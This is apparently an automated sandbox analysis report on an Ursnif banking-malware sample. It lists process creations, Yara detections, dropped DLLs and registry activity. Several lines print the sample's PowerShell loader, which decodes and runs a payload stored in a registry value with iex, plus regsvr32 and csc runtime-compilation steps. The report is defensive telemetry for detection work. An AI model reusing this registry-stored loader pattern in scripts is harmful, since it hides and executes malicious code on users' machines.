Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17468 /prefetch:2	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002120 push ecx; ret	0_2_10002129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002173 push ecx; ret	0_2_10002183
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04642D8B push ecx; ret	3_2_04642D9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04629670 push ecx; mov dword ptr [esp], 00000002h	3_2_04629671
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046428A0 push ecx; ret	3_2_046428A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9ABC0 push ecx; ret	7_2_04E9ABC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9AF6F push ecx; ret	7_2_04E9AF7F

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
